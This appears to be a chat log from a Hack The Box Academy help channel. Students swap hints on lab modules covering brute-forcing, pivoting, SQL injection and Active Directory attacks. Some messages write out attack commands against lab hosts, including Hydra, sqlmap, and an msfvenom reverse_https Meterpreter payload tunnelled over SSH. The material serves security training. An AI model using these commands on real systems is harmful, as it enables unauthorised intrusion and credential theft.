It runs just fine against the target in the Network Services section

Adding the --verbose flag has helped you though! Looks like you're running into a security error with SMBv1

The Academy is not free and costs money.
With the 50 cubes you receive at the beginning, you can complete the Tier 0 modules. All other modules cost money

oh that's a shame

thanks for helping

Have you completed the Password Attacks module? did you have the same problem?

Yeah I completed it. Looking back on my notes...i think you're going down the wrong path if you're on medium. Feel free to DM me

Ugh, SomeOne please help? i have been stuck on the intoduction to linux module for 3 days now and cant figure out either how to properly install OpenSSH or how to properly connect, etc. i have done youtube tutorials ad tried many alternatives. If anyone is willing and or wanting to help a noob out, feel free to hit me up pleas. "Service and Process Management" P.S. I know i can provide much more details for better potential help though its just a lot what i tried so to now 1 message spam i will await

Openssh should be preinstalled

anyone is free

hey im working through "attacking web application with ffuf" and for the life of me cant find the page with "You don't have access!".  The combination of subdomains, extensions, and directory list is taking far too long to scan, even without recursion.  i've also manually scanned the two subdirectories and found seemingly nothing underneath them.
EDIT: solved by following hint more carefully and/or using a (further) reduced wordlist

halp

Assuming that we are both correct and that htb academy was just throwing everyone a curveball by saying if it's not installed, then what? I tried connecting but I keep getting an error message, if you have some time I can go into more information?

Hey all - I'm on the responder module. When I launch my responder I'm getting a different IP then the one given by openVPN. Is that correct? If so I'm not receiving any events when trying complete the challenge capture. Any tips on how to get Responder working?

+HelpPlease *Linux Fundementals *Service and Process Management"
sytemctl start ssh _______> "AUTHENTICATING FOR org.freedesktop.systemd1.manage-untits +++ " ____> Authentication is required to start 'ssh.service'.
Authenticating as: ,,, (htb-ac714580)
Password:
polkit-agent-helper-1: pam_authenticate failed: Authentication failure <I am using the provided - HTB@cademy_stdnt! |> <I dont remember if i changed it but if not prompted then i havent> #1024429874246590575

I was going to buy the student monthly subscription but it wont let me but it. Who do i need to contact?

for that you need a student email but your college need to be in htb list

if is it isn't you can contact support to add your college to htb list

How would I contact support?

there is no responder module?? if you are in the on the responder box try asking that at #starting-point

there should be a chat bubble on the bottom right of the htb academy page

also if you have adblock on it cloud block this

so which section are you on?

final section: skills assessment

if you have question about modules then you can just ask it here

ok

i had but solved

next time i will

thnx

and that's question 3 right? i can't remember but i think question does give you some example extension right? then one of that shuld worked also i did noted down there could be a bug in this if you can't find anything try spam restart the target machine a few time (4 work for me)

Hi "Skill Assesment - Broken authentication", someone ?

sure shoot me a dm

#UPDATE# To get authenticated withouth the password i was forggeting sudo lol but still seeing "journalctl -u ssh.service --no-pager" "No journal files were found "No entries" so i am assuming that i may have not connected properly

yup 3rd question. will give it another shot with a fresh target, the hint is pretty explicit

so what's your original question and issue again?

There seems to be a problem with the target machine in the skill assessment - website in the module login brute forcing. The IP:port is no longer accessible. I have tried to reset the target multiple times. But nothing seems to work anymore.

password attacks lab- med skills assessment. I have seen a ton of people ask the same question, but no answers likely to spoiler. Stuck after getting the 2nd user. Thought I knew the way, but its been 2 days messing with it and no luck. anyone for a ping?

In this case I am trying to access 138.68.164.196:31389. But it's not loading anymore.

i just give it a try and the target seem to be working fine for me

ok this target is dead

Could I be that i am now somehow locked out due to resetting the target too many times or whatnot?

+locked out

if you then you are the first but i think nope

try refresh the page and spawn another target

if that still doesn't work you can use my target

Yeah tried that multiple time. Didn't work. But now I have one that seems to work.

if you got 2 user that can login via ||ssh|| hint check the ||key||

yea i assumed I needed to crack the pw to 1 like it was in the module. but that doesnt work, been reading about other possibilities. not sure what else to even try

also you mean the user that start with an ||d|| right?

yes, looked thoroughly through what they have done, and have available to them. seemed like it just needed to crack the key- but no go

I could actually use some help with this skill assessment. I have adjusted the url, failed string and login parameters accordingly, tried all the members of the gates family and user, also tried rockyou, incl rockyou<number>, but i can not get the credentials. Been pulling my hair out for the last few hours on this one.

shoot me a dm on the what issue you are having, it should be straightforward with john

for the wordlist you can just use rockyou and the main thing about this one and is the failed string and login parameters

found it, thx. FWIW i made it faster by trimming the dirlist down to the first 10k entries

Got it, thanks. From the forum i understood i had to use rockyou5, 10 or 15. But that obviously was incorrect. Got it now. Hint: Hogwarts Legacy!

module:Using CrackMapExec
Skill Assessment
Gain access to the SQL01 and submit the contents of the flag located in C:\Users\Public\flag.txt.
I need some help i cant find any more accounts to get access to sql01 can u give me some hints

Hello, I havent been unsuccessful at completing sqlmap case 8.

Ive tried the following commands:

sqlmap -r request.txt --csrf-url= http://161.35.41.48:30009/case8.php --csrf-token= S56J2VYC34zZPyLxHMQRLHjUWUdX8sRzRMnHY8COnw --cookie=q57abl4kklnsb1psr6565o4bdk

sqlmap -r request.txt --csrf-url= http://161.35.41.48:30009/case8.php --csrf-token= S56J2VYC34zZPyLxHMQRLHjUWUdX8sRzRMnHY8COnw --batch --dump -v 3 --level 5 --risk 3 --cookie=q57abl4kklnsb1psr6565o4bdk

Can someone provide me a hint or nudge me in the right direction?

dm

hey guys, i know my question isnt really all that intresting and maybe its somethng stupid easy but i just cant seem to figure it out. if someone, anyone can please dm me that would be great. until then, SoloLearn since its a bit for noob friendly. I already paid over 500 into HTB so backing out is not an option. For more info on question topic etc.. see the most previous post from me

what?

PIVOTING, TUNNELING AND PORT FORWARDING. Im on the last question, where i need to get the flag from the Domain Controller, i think i already have the IP of the machine but i cannot manage to hace access. Im using netsh on the 2 and the 3 machine to get access to the Domain Controller (the 4 machine) it is possible that I am doing more that i'm suppose to hahaha i'm missing something. any help is appreciated guys

It looks like your command ran fine and the service just wasn't logging anything. You can continue on with the module. Also, if you are using pwnbox the password for your user is in the credentials file on the desktop if it asks you for it again in the future.

pro tip: fill out all of the fields in mstsc.exe

hey guys, im new so i have no idea how to hack im here to learn so can anyone help me with what i have to do for first tat would be great thanks to yall!

Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible

Thank you!

i dont get what to do at the first answer

anyone can help me?

this channel is for academy module discussion only

Try the pentest process module under the pentesting path. Should be a decent start

#welcome

Hi, could someone help me with the password cracking module? If I use hashcat on the resource password list with the provided custom rules I end up with >90000 passwords. After 2 hours the machine and target timeout, but Hydra or CME are still running. This is the third time I've waited 1.5+ hrs for a nothing burger. I must be doing something wrong.

sorry,where do i have to ask those questions

DM me

#welcome

which service are you targeting

SSH

wrong answer

"Create a mutated wordlist using the files in the ZIP file under "Resources" in the top right corner of this section. Use this wordlist to brute force the SSH password for the user "sam". Once successful, log in and submit the contents of the flag.txt file as your answer." this is the question

ssh is super slow to brute you basically never want to target it for cracking like that

I know what the question is. Its lying to you.

i use hydra -l "sam" -P list ssh://targetIP

What?

so i use winrm or smb to crack the pw?

dont brute ssh

can still use hydra

Wow, they could've mentioned that lmao

just dont go after ssh

its a trick question

What service would you suggest? SMB?

teaching you the best way to brute ssh is to brute something else

thats up to you and your enumeration

AH alright

I see

Wow thanks for that info!

even the right answer though will still take 30-45 minutes as a heads up

That's alright 😛 I'm used to waiting haha

If you remove all inputs shorter that 7 letters it takes you less than a minute

if you remove the first 17000 or 150000 passwords hydra will get a hit faster

while true I dont like those cause its a bit too much "meta" knowledge. Real world you wouldnt arbitarily do that unless you had extra information to indicate it was a good idea(like pulling the password policy)

i sorted and uniqued the list so i had significantly reduced the keyspace, then i chopped the entire list into 9 different chunks and brute forced each chunk

hydra didn't brute force the password.

not sure what happened there but i checked with grep later and the password was in that list...

I had some weird issues sometimes with brute forcing on my own machine, but it worked in pwnbox, so now everytime a module wants me to brute force a large file I just go on pwnbox

module:Using CrackMapExec
Skill Assessment
Gain access to the SQL01 and submit the contents of the flag located in C:\Users\Public\flag.txt.
I need some help i cant find any more accounts to get access to sql01 can u give me some hints

Could somebody check at the modul PIVOTING, TUNNELING, AND PORT FORWARDING , Section Remote/Reverse Port Forwarding with SSH if he/she can get a Meterpreter Session Established?

Because i try since 2 or 3 days and it does not work...somehow i believe this is not working for anybody...

AD Enumeration & Attacks - Skills Assessment Part II

Can someone DM me I am stuck on the second to last question trying to get to DC01

InteralIPofPivotHost = 172.16.5.129
ipAddressofTarget = The target is spwan

is that right?

@timber hatch yes

if you know exploit i would recommend re-visit the section about that exploit

pivot is the one spawned not the target

the target is in the internal network

use netstat to see established connection. Dont just go ahead and copy past what you see in the module

Thanks I’ll look again

updating the activity log is probably the most annoying thing

no

obviously not

it should be in the same subnet

yes then your statement "pivot is the one spawned" is simply wrong or misleading....

how?

InteralIPofPivotHost = 172.16.5.129
ipAddressofTarget = The target is spwan

reagrding to my question

ok as I remember

you need to get an ip which is the pivot

and then start listening that ip and attackin the target over it

the subject is pivoting

so they want from you to use the pivot to attack internal network over it

yes that is all clear for me

If someone has completed the CrackMapExec Skill Assessment please hit me up 🙂

how misleading then? Dont get it

the pivot host has two ips

an internal and the one spawned

everything has it like that

you have a computer

you are connecting to a router

and when you open a website the website gets the ip from the router

so everyone connected to the that router has that same ip

but you have another ip in the network so router knows who to send the information

let say your phone also connected to the same router

Look, here are my settings:
Target spwawned: 10.129.121.188
msfvenom -p windows/x64/meterpreter/reverse_https lhost=172.16.5.129-f exe -o backupscript.exe LPORT=8080
scp backupscript.exe ubuntu@10.129.121.188
ssh -R 172.16.5.129:8080:0.0.0.0:8000 ubuntu@10.129.121.188 -v

Here are the Commands regarding HTB:
msfvenom -p windows/x64/meterpreter/reverse_https lhost= <InteralIPofPivotHost> -f exe -o backupscript.exe LPORT=8080
scp backupscript.exe ubuntu@<ipAddressofTarget>:~/
ssh -R <InternalIPofPivotHost>:8080:0.0.0.0:8000 ubuntu@<ipAddressofTarget> -vN

and what is the problem ?

I still have this error when trying to authenticate using the MSSQL protocol. I tried to specify the domain, but this does not work. Any idea why?ERROR(SQL01\SQLEXPRESS): Line 1: Login failed. The login is from an untrusted domain and cannot be used with Integrated authentication

meterpreter is doing nothing

well, I haven't done that module. But somehow my cme is broken :(( giving errors all the time. Have you checked that, if yours working in order?

Yes my version of CME is right. I don't think that's the issue.

lol. ok...i have solved it...haha
i had to manually execute the backupscript.exe file at the windows host...i tought somehow this will somehow be triggered with a command above...

never mind...

hahaha

o7 HTB, On Pivoting, Tunneling, and Port Forwarding Skill assessment and have lsasso'd some cred for v*... I'm now stuck figuring out my next move towards the DC....also on another now How do we id a DC in our pentesting context - "from outside peering in"?

Regarding the reverse port forwarding with SSH section in the "pivoting, tunneling and port forwarding" module, why do we have to use the reverse_https payload? I'm not understanding why a meterpreter reverse_tcp payload isn't working (I tried it and got nothing back).

First think about the direction of the port

Then consider why wede want to encrypt our exfil & infil traffic

Lastly this allows us to somewhat persist poet initial connection aswell as utilize our attk host directly

As far as non response goes: reset and follow the steps, analyzing each as shown in the lab's pretext

I think that after active directory I am glade that web proxies is next lol that. AD was brutal.

I'm having trouble with finding the waldo.txt file in the Finding Files and Folders section of Intro to Windows CMD line

Im righttttt behind you @.@ i know ill feel the same way

if I type:

where /R C:\Users\ waldo.txt

it doesn't work

I get an error

cmds to try : find / dir / tree

try where /R c:\

💯

I tried that as well

it still got me an error

what is the error?

whats the error?

Where Object: A positional parameter cannot be found that accepts argument 'waldo.txt'

even if I do it recursively from C drive

should I restart machine?

doing attacking enterprise networks and SQLMap is having a really bad time on ir.inlanefreight.local

see if doing the where /R c:\ *.txt to see if it finds any .txt files

I already tried that fifteen minutes ago

didn't get me results

reset and hold for like 5 mins

try restarting machine; remoting back in; and try again

ok thanks

you can also try doing echo 123 > test.txt and run the where command on the test.txt

to see if it's just being fully weird

that section is... weird

i ended up finding waldo.txt ||on a different vm||

0.0

Awesome glad you got it 😄

ok so I started a new machine and it still didn't give it to me

SQLmap cannot work with this machine, i will have to use regular sql injection

Except i'm getting a proxy error now so i can't even do sql injection

I assume I need to do the where command like where /R C:\Users\ waldo.txt

then get location of file then type:

find "HTB" C:/Users\[file-path-to-waldo.txt]\waldo.txt

but the problem is any variation on the where command isn't working

but am I right about the concept?

just do type C:\path\to\waldo.txt

type will type out the waldo.txt

unless it is specifying using the find command

its specifying find

then yes you would use find "string" C:\path\to\file.txt

ok well that's not working so what do I do?

because where won't find the file

move on it seems like this is a common issue

it seems like waldo.txt can be found in another part of the module

ok what's the flag just so I can enter it in? can you dm it to me?

no

ok

you still have to find it yourself

ok

but it sounds like waldo is on a different machine in that module

ya because there's a Flag.txt.txt file that is NOT "waldo" in the C:\ folder and the contents are NOT the flag of this module

so how do I go about finding the flag? any hints based on that?

maybe two VMs were swapped by accident?

my advice: go through the next sections and come back to that question later.

ok thanks

ok

Nvm got it

would like to know why i'm getting "No route to host (Host unreachable)" in Burp Suite against ||monitoring.inlanefreight.local|| in Attacking Enterprise Networks - Web Enumeration & Exploitation

SQLMap was also very slow and getting a lot of 502 responses

the host is up and i can issue commands

hi all

Did you put the ip-> hostname into /etc/hosts?

yes

Hydra question for you experts! (Trying it against Pennyworth in Startingpoint Tier1). "hydra http-form-post -U" lists several optional parameters, one of which I'm interested in:
"2= 302 page forward return codes identify a successful attempt".

Has anyone used/gotten this to work? My string of

"/j_spring_security_check:j_username=^USER^&j_password=^PASS^&from=%2F&Submit=Sign+in:F=loginError"

is all well and good, but the actual success produces a redirect, and I can't figure out the command line syntax. (BTW I know the username/password, I just want to practice getting hydra syntax correct) Right now the only way I can find the valid username/password is to set "-t 1", number of threads to 1, with -v -V verbose so I can see the redirect response happen right after the candidate username/password attempt.

head to #starting-point

hi why isn't there a lot of tier III and IV stuff? Is more gonna be added soon?

and will tier III and IV stuff ever have job-role or skill paths or be a part of skill paths?

I think that if there were more advanced skill paths that would be sick

I have a question, I am very new to this kinda thing but I have I incountered a question on a module quiz that said “find out the machine hardware name” my first answer was amd64 and this was incorrect, so I tried x86_64 and this was correct. My question is why? Are there different amd hardware options that are not x86? I am confused, I tried google but it basically said amd64 and x86_64 are the same thing.

because x86_64 is basically the actual architecture

for instance when I run uname -a on my vm I get a bunch of stuff

but if you look at uname --help it shows that there is a tag -m that is specifically to output the machine name

also if you look at the help command it tells you that uname -a prints out the tags beneath it in that order; omitting the -p and -i if they come back as "unknown"

I see, I think that uname —help is going to be my new best friend. Thanks for helping me get all this lined out!

eh you rarely need to use uname unless you're verifying something or are remoted in and searching for vulnerabilities to exploit

also a HUGE thing to note; with examples sometimes you can't recreate them 1 to 1 in the practice; sometimes they want you to take the knowledge and do some minor abstraction to make it work for your system

does this mean what I think it means?

exam time

gl :) but I'd say take a few days to go over your notes; rewrite any old notes with new knowledge, etc

like for me my common note for cme smb is ALWAYS ADD --local-auth

that gets me SO MUCH

i feel like i need practice first so i'm gonna drop into the dante prolab and do it as if it's an actual engagement

big tip especially; write your exploit path as you go through and exploit

i noticed that writing the report as you go is a theme

well think about it this way; if you spent 2-3 hours exploiting how likely are you going to remember your initial point of entry

i can't remember a lot of things

lol

SO writing as you go helps a TON

my memory goes like "what did I... Oh yeah"

definitely going to practice notetaking and documentation

mhm Do it on live boxes too

I'd say; do dante - reset progress, and using your Documentation, seeing if you can repeat the pwn

sounds good

mind if I DM you about the attacking common services module SQL regarding which wordlist to use? the provided wordlist seems to not yield results

nvm

it seems like hashcat didn't like me :(

but john did :D

module: Attacking Common Services; SQL Database
Cannot seem to login or auth using sqsh in the pwnbox if someone could direct me to what I'm doing wrong that'd be great

Has anyone ever had the "cannot spawn target" error on htb?

@west canopy are you around for this? ;w; because it's lowkey annoying bc my vm is parrotOS...which is having the issues with sqsh ;w;

mssqclient.py?

i'm having issues getting mssqclient.py to work

unless I'm just entering it wrong; I'm trying to access the mssqlsvc user :) which is where my issue is

but again I'm all for User Error

have you tried with mysql remote host connection command?

and here is where I'm lost LOL feel free to DM me what I may be doing wrong

where exactly you are lost at, the syntax or something else?

syntax probably

Restarted my system and now it works.... i hate it here

nice

I figured out what it was I forgot to do -windows-auth :^)

how to find the hostname of a host from its ip in an ad?

as an example i have 3 ip's: 172.16.7.3, 172.16.7.50, 172.16.7.60

how to find out which host is SQL01

cme?

^

open ports?

yeah if you do a script nmap scan doesn't it just flat out tell you?

i did but it but found nothing lemme try again

try specifically looking for the SQL ports

linux priv esc makes a nice easier change from AD lol

got it thanks

a lot less moving parts huh

yeh my brain runs out of RAM for a lot of the AD stuff lol

Is there a good way to take notes.
Currently I use obsidian on windows and then defender start deleting file which is liked with gitlab for backup. But the file keeps deleting.

You might want to put exclusion directories for your cybersecurity stuff.

add the filepath you're using to the Defender Exclusion

This ; I figured it out pretty early on so I was able to mitigate note loss; the reason for this is that it is taking some parts of your notes and (rightly) taking it as potentially dangerous :)

Even after adding the DNS to the /etc/hosts file I can't open the website or more specifically the website is very slow and not fully connecting

what module are you working on and section?

I did it but the obsidian creats some kind of restore file and defender starts notifications for viruses found

umm don't know bout module it's a machine called stocker

From htb machines

that is a box then and your question is not related; verify your htb account in #bot-commands and ask in the #boxes channel :) or you might even see that your question has already been answered

Sorry I am new and didn't know where to get help this one was active so texted here

this channel is for modules found on https://academy.hackthebox.com/

and I'm redirecting you to where you'll be able to get your question answered

:)

Thank you

I don't use obsidian but you should be able to trace where it is making the restore file via the virus notification and exclude that location as well.

click on defender and find the filepath that it's deleting and create an exception for that root folder

Yeah, it picks up code blocks and what not. Mainly the well known ones on the internet and from courses. Never really lost notes myself, but it does generate conversations with IT whenever something gets flagged at work.

using your work system for notes

spicy

Mainly temporary storage and experimentation. Wouldn't recommend using your work system for permanent notes or anything you want to keep, the IT group is worse than AV, they will log on to your computer and delete stuff 😅

duh

can anyone help me in COMMAND INJECTIONS Skills Assessment ?

also don't ask to ask; just ask your question that way if you step away and come back it may be answered

where are u at

just try and avoid having spoilers in your post

hey marcie

it avoids having to answer questions like this ^ if you just asked your question you could have had your question answered faster :)

tru

http://dontasktoask.com

Thank you so much for that, I neeThank you so much for that, I need to know how I ask in a correct way d to know how I ask in correct way

At the beginning, I tried a lot to discover the vulnerability of injecting commands with many characters in advances search and to parameter, but unfortunately I could not find out the correct character, is there anyone to guide me?  I just need a little hint or clarification to get me going

where are u injecting what

Have you tried everything the module/section has taught you so far?

No idea why, but I'm stuck in a really stupid spot on AD Enumeration & Attacks - Privileged Access.

The last question on leveraging SQLAdmin rights says to 'Authenticate to 10.129.197.111 with user "damundsen" and password "SQL1234!"'... Authenticate how exactly? RDP doesn't make sense, as I need to run myssqlclient.py from my Linux box, and SSH doesn't work. Any pointers?

pivoting is handy

Yes, without use tool

kindly show us the burp petitions ur using

^ unless you are not using burp; in which case - that is why you are unsure where to go

you aren't using a proxy to capture input to see what is being done to it

in content= and ?to= parameters

i have the image, but how I can send to you it ?

bro, copy paste it

he can't paste screenshots

he has not verified his htb main account

:)

that is probably the other part of issues

you can paste blocks of code with ``` at the start and end of the code

well, hint, there are other easier injectable endpoints

I do not got it, if you HTB Acadimy account i verified it

Gah - thanks!

Very good, thanks @sly reef

also, start by checking which characters are filtered

By using same this way => &whoami (without encoded command? )

no

only the character

should be enough for the payload to returnerror

I will try, thanks @sly reef

Hey

Hey guys, so I'm currently doing some DNS recon (both footprinting and web recon module).
As it stands, I'm doing axfr (zone transfer) tests one subdomain at a time. is it possible to dump bulk axfr requests to a list of subdomains? (eg. recursive axfr recon?)
Maybe there is a tool I am missing? Thanks!

Haven't come across a tool for it, but I've used a simple bash script/loop with good success doing bulk AXFRs for a list of subdomains.

E.g., along the lines of for s in $(cat subdomains.txt); do dig axfr $s @x.y.z.w; done